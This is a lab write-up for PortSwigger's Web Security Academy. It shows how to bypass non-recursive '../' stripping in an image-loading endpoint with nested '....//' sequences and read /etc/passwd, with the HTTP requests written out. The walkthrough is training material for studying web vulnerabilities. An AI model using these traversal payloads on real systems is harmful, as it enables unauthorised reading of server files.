| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Path Traversal (Non-Recursive Stripping) |
| Difficulty | Practitioner |
| Objective | Retrieve the contents of /etc/passwd |
File Path Traversal, Traversal Sequences Stripped Non-Recursively¶
A shopping app displaying item images loads something like:
<img src="/image?filename=63.jpg">
Intercepting the request on Burp:
GET /image?filename=28.jpg HTTP/2
Trying the previous two approaches:
GET /image?filename=../../../../../etc/passwd HTTP/2
returns "No such file", and:
GET /image?filename=/etc/passwd HTTP/2
also returns "No such file".
So this app strips ../ from the filename before using it, and doesn't have the absolute-path issue from the previous lab. If the stripping only happens once (non-recursively), nested sequences like ....// survive the strip — removing the inner ../ from ....// leaves ../ behind. Trying:
GET /image?filename=....//....//....//etc/passwd HTTP/2
After a single non-recursive strip pass, this collapses to:
../../../etc/passwd
which is enough traversal depth to reach /etc/passwd.
/etc/passwd comes back.
and lab solved